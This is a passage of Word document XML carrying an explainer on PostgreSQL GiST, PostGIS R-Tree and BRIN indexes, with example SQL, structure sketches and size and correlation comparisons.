    <w:p w14:paraId="24653275" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  consistent(entry, query): does this subtree possibly contain matching entries?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D6CB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  union(entries): compute bounding value covering all entries in a node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50D438" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  compress(key): convert key to indexed representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA281B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  decompress(key): reverse of compress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071183C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  penalty(existing, new): cost of inserting new into existing node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F844D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  picksplit(entries): how to split an overfull node into two nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607537F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  same(key1, key2): are two keys equal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF07BA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic queries with GiST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4CB14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF7915" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Bounding box index for geographic coordinates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C50B06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON locations USING GIST (coordinates);  -- PostGIS geometry type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744AA57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6047982E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Find all locations within 10km of a point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A60EFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT * FROM locations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9966BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE ST_DWithin(coordinates, ST_MakePoint(-122.4194, 37.7749)::geography, 10000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0712F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="106E5676" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GiST index structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7951A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Internal nodes: bounding boxes that contain all child entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FF509" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leaf nodes: actual geometry + row pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71085E5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69191EFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query with bounding box: quickly prune subtrees whose bounding box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C64D24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    doesn't overlap the search region → O(log N + K) for K matches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A1C44" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    instead of O(N) full scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B53C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R-Tree variant (PostGIS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7951BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostGIS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R-Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (a GiST-based structure specialized for rectangles) for spatial indexing. R-Tree groups nearby objects into </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>minimum bounding rectangles (MBRs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> at each level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41505F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B51365" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>R-Tree structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5DD16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Root: one MBR covering all objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF7534" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Internal nodes: MBRs covering groups of child MBRs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10700810" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leaf nodes: individual object MBRs + row pointers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1FBD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42566EFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Spatial query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ECFFF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Start at root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724333F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    At each level: check which child MBRs overlap query region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEB82E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Only traverse overlapping children (prune non-overlapping subtrees)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C6A58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Return leaf entries whose objects actually satisfy the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03087D33" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7CF16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Overlap can cause multiple path traversal (unlike B-Tree which has one path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61907CB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  But for typical spatial data: O(log N + K) practical performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DAE2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BRIN (Block Range INdex) — Minimal Footprint for Correlated Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE006E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What BRIN indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F75D737" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>BRIN stores </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>summary statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (min, max) for each block range (128 consecutive 8KB pages = 1MB of table data by default). Instead of storing per-row index entries, BRIN stores per-block-range statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CDFFCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DAEC09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table: sensor_readings (sensor_id, recorded_at TIMESTAMP, value FLOAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DCE37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Rows inserted in roughly timestamp order (temporal correlation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCEF9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26815FDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>BRIN index on recorded_at (128 pages per range):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C473E48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Block range 0 (pages 0-127):    min=2020-01-01, max=2020-02-15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D354F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Block range 1 (pages 128-255):  min=2020-02-15, max=2020-04-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3562F9C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Block range 2 (pages 256-383):  min=2020-04-01, max=2020-05-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31153E94" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E9433" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558399A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE recorded_at BETWEEN '2020-03-01' AND '2020-03-31'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A690F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Check each block range's min/max:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513A979" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Range 0: max=2020-02-15 &lt; '2020-03-01' → SKIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E594FB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Range 1: overlaps → SCAN these 128 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353E144" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Range 2: min=2020-04-01 &gt; '2020-03-31' → SKIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5D9FA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8115B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Only the overlapping ranges are scanned (plus false positives from ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E991E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  that overlap the boundary but may not contain matching rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C4CB32" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BRIN performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB418F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E0FAD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index size: tiny (one entry per 128-page block range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C1AD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1 billion row table: ~1 million block ranges → ~16MB BRIN index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D9BE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Equivalent B-Tree: ~10GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09925D1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Size ratio: 600× smaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AC87F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA9B5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Build time: fast (scan table once, compute min/max per range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6EF7C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Update overhead: minimal (only update the block range for the modified page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667E6AF2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9AC58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB56B0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Best case (high correlation): eliminates 99%+ of table pages to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8F60A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Worst case (low correlation): must scan all pages (equivalent to full table scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363C46F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6573B841" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Correlation requirement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23707EF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  BRIN only works when column values correlate with physical storage order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC38C0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- timestamp inserted in order: excellent correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E05252" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- random UUIDs: no correlation (BRIN useless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C2E2D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- auto-increment IDs: excellent correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30851DC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD46D06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Check correlation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59678A8C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  SELECT correlation FROM pg_stats WHERE tablename = 'sensor_readings' AND attname = 'recorded_at';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743AF100" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- correlation = 1.0: perfect correlation → BRIN ideal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C8C88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- correlation ≈ 0: no correlation → BRIN useless, use B-Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7F6E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use BRIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6D56D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A669FBA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Best use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A500D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Time-series data (IoT sensors, logs, events) inserted in time order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE661" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Audit tables (append-only, sequential IDs or timestamps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BE131" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Partitioned tables (each partition naturally correlated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AAF95C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Very large tables where B-Tree index size is prohibitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512CE8C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA2601" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Example: 1TB log table, queries mostly by time range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0D1CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  B-Tree on timestamp: ~100GB index (10% of table) — expensive to maintain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D6C5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  BRIN on timestamp: ~150MB — 670× smaller, nearly as effective for time-range queries</w:t>
